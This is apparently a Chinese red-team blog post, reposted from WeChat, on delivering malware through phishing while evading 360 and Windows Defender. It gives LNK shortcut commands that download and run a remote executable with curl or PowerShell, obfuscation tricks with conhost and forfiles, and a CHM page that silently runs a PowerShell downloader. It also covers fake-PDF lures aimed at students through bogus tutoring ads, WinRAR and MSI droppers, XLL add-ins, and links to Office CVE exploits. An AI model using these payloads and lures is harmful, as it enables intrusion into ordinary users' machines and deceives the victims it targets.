WINRAR自解压
选择添加到压缩文件
选上你的exe(或者VBS脚本)
选上你要运行的VBS或者EXE
全部隐藏
以及这两个选项
记得选上解压路径
lnk钓鱼实战思路
在这个方法之前先来了解一下网上其他方法,在目前已经欠佳了的,这里提供的lnk指向大同小异,可能有的会有弹框没处理。并且现在单lnk钓鱼的方式非常少查杀力度很高
指向cmd
lnk直接指向C:WindowsSystem32cmd.exe后面跟参数执行命令的,这种方法在360环境下已经失效了,但大多数Windows defender环境绕过是能绕过,不过特征太明显了。
C:WindowsSystem32cmd.exe /c "curl http://xxx:10000/mylnk.exe -o C:UsersfuckmianshaDesktopmylnk.exe" && C:UsersfuckmianshaDesktopmylnk.exe
指向conhost
执行cmd命令时候还可以这样做混淆:
C:windowssystem32conhost.exe conhost conhost conhost conhost conhost conhost cmd /c notepad
指向powershell
lnk指向Powershell的方式远程下载文件并且运行,和指向cmd差不多。同时,运行ps1脚本也是可以(已经报毒了,defender也报毒)
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'http://xxx:10000/mylnk.exe' -OutFile 'C:Users20h2Desktopmylnk.exe'; Start-Process 'C:Users20h2Desktopmylnk.exe'"
指向explorer
lnk指向explorer可以执行大多数的内容,后面加上cmd.exe、powershell、vbs、hta、可执行文件等,这种方式在df环境下可还行,在360环境下会直接报毒。
指向forfile.exe
forfiles.exe /p c:windowssystem32 /m user32.dll /c"0x630x6d0x640x200x2f0x63 notepad | calc
这里的0x630x6d0x640x200x2f0x63是十六进制的cmd /c
指向cscript、wscript过360核晶
指向cscript、wscript可以运行vbs脚本,这种是绕过360核晶比较好的方式,缺点就是不能单单lnk文件进行钓鱼,所以钓鱼过程中都是要发压缩包的。它的利用场景有很多,最容易的就是在校园墙表白墙上发布当地的家教信息,而家教信息是我们经过加密的PDF文件,在外部有一个PDF-password.txt.lnk,这一个lnk内容是cscript.exe指向一个隐藏文件夹的vbs。
文件架中是当地的高薪家教信息。另外也可以放,某某资源,某doll等内容😎(前提是报备允许):
首先我们得木马是改过为pdf后缀,配合里面的pdf文件,dll也是,而shellcode.bin的话随便什么都可以了因为那是二进制打开的。指向的VBS会修改白程序后缀(这里可以做一手修改图标的操作更像一点),修改黑dll名字和后缀,并且运行,之后删除password.txt.lnk文件,释放真实的password.txt,并且打开这个密码,最后删除VBS文件!
效果演示:
完整钓鱼样本经过处理(改为弹计算器了)以及完整思路也放在了内部圈子了~
对象位置混淆
$file = Get-Content ".test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(".PDF.lnk")
$Shortcut.TargetPath = "C:windowssystem32cscript.exe"
$Shortcut.IconLocation = "%SystemRoot%System32Shell32.dll,70"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()
这个powershell脚本会读取test.txt的内容,比如内容是123.vbs,之后TargetPath会和它进行拼接,由于lnk的对象位置最大容量为260左右,所以多出来的不会显示在属性之中:
修改快捷方式图标
首先随便创建一个普通的快捷方式(这里指向计算器) 然后先换这个!(否则后面会出错) %SystemRoot%System32SHELL32.dll
然后我们这里用010editoer 首先安装一个这个库:
然后去010editer把这个打开:
然后去下面修改这个
如果你想要pdf的话就是 .1.pdf
如果想要docx 就改成 .1.docx
此外以下内容也可以成为图标路径
access = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}accicons.exe"
excel = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}xlicons.exe"
lync = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}lyncicon.exe"
office = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}ohub32.exe",56
onedrive = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}grv_icons.exe"
onenote = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}joticon.exe"
outlook = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}outicon.exe"
powerpoint = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pptico.exe"
project = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pj11icon.exe"
publisher = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}pubs.exe"
visio = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}visicon.exe"
word = "%PROGRAMFILES%Microsoft OfficerootvfsWindowsInstaller{90160000-000F-0000-1000-0000000FF1CE}wordicon.exe"
设置系统级隐藏文件夹
用管理员打开cmd:
attrib +s +a +h +r e:baktools
-
+s:系统文件属性 -
+a:存档属性 -
+h:隐藏属性 -
+r:只读属性
在bandzip能看见,在windows默认点击zip能看见,7zip也能看见,但是默认的windows解压看不见(就算是开了显示隐藏文件夹)
单lnk无下载操作
用到lnk的时候可能会使用到多个文件或是下载文件,现在分享一种单lnk文件无下载的方式,直接将exe或dll放入lnk里面,并且点开还会显示正常的内容。这种方式在360和火绒下均会报毒,但经过测试在df下不会报毒,也能分享给大家学习~
项目地址:https://github.com/d1mov/evillnk
CHM钓鱼
调用calc不会出事,但是调用powershell会出事。这种方式可以配合vbs脚本执行!
<html>
<head>
<title>Download and Execute xxx.exe</title>
</head>
<body>
<h1>Download and Execute mintty.exe</h1>
<p>Click below to download and execute mintty.exe from the specified URL:</p>
<OBJECT id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width="1" height="1">
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c $client = new-object net.webclient; $url = 'http://xxxx:8080/xxx.exe'; $outputPath = 'C:Users$env:USERNAMEDesktopxxx.exe'; $client.downloadfile($url, $outputPath); if (Test-Path $outputPath) { Start-Process $outputPath } else { Write-Host 'Download failed' }">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body>
</html>
msi钓鱼
MSI是winodws的安装程序,先来讲讲怎么制作,对于msi的打包工具有很多,这些工具都很难操作,这里推荐一个较为简单的打包工具——MSI Wrapper:
记得把这个选上
全部选Hidden
这里选择Always Elevate
这个随便选一个填就好了
这里直接选Registry 或者说自定义(Manual)
如果想像一点的话可以加
这个记得加上 /S 的参数
最后直接build
利用Office进行攻击
对于Office来说网上常见到的是使用宏和加载项,but这都难免会有安全警告,接下来分享一种加载项进行钓鱼的,同时也可以用来进行维权操作。原理大致是,excel可以打开一个恶意的xll文件(和DLL文件基本差不多),这个xll文件利用的则是office的加载项,同理word、ppt也可以使用类似的用法~
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md
CVE
Office历史上出现的可导致远程命令执行的漏洞有很多、如:CVE-2017-0199、CVE-2017-8570、CVE-2017-8759、CVE-2017-11882、CVE-2018-0802 等:
CVE-2017-0199
https://github.com/bhdresh/CVE-2017-0199
影响版本:office 2016、2013、2010、2007
CVE-2017-11882
https://github.com/Ridter/CVE-2017-11882/
影响版本:office 2016、2013、2010、2007、2003
CVE-2018-0802
https://github.com/rxwx/CVE-2018-0802
影响版本:office 2016、2013 Server Pack1、2010 Server Pack2、2007 Server Pack3
原文始发于微信公众号(半只红队):【永不空军!】| 360核晶等杀软环境下钓鱼思路分享
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论